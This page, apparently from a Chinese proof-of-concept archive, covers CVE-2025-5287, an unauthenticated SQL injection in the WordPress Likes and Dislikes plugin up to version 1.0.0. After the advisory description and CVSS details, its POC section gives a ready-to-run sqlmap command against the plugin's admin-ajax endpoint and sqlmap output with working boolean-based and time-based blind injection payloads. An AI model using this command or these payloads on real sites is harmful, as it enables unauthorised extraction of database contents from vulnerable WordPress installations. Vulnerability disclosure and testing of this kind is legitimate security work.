关联漏洞
Description
Likes and Dislikes Plugin <= 1.0.0 - Unauthenticated SQL Injection
介绍
# CVE-2025-5287
Likes and Dislikes Plugin <= 1.0.0 - Unauthenticated SQL Injection
# Description
The Likes and Dislikes Plugin plugin for WordPress is vulnerable to SQL Injection via the 'post' parameter in all versions up to, and including, 1.0.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
## Details
- **Type**: plugin
- **Slug**: inprosysmedia-likes-dislikes-post
- **Affected Version**: 1.0.0
- **CVSS Score**: 7.5
- **CVSS Rating**: High
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- **CVE**: CVE-2025-5287
- **Status**: Closed
POC
---
```
python3 sqlmap.py -u 'http://kubernetes.docker.internal:8999/wp-admin/admin-ajax.php' --data='action=my_likes_dislikes_action&post=1&state=dislike' --level=2 --risk=2 --dbms='MySQL' -p post --random-agent
```
```
sqlmap identified the following injection point(s) with a total of 372 HTTP(s) requests:
---
Parameter: post (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: action=my_likes_dislikes_action&post=1 AND 8197=(SELECT (CASE WHEN (8197=8197) THEN 8197 ELSE (SELECT 7036 UNION SELECT 3343) END))-- -&state=dislike
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: action=my_likes_dislikes_action&post=1 AND (SELECT 7318 FROM (SELECT(SLEEP(5)))OIPg)&state=dislike
---
```
文件快照
[4.0K] /data/pocs/da358e3f5c2ee1666196e73f2d567afc15157ec6
└── [1.6K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。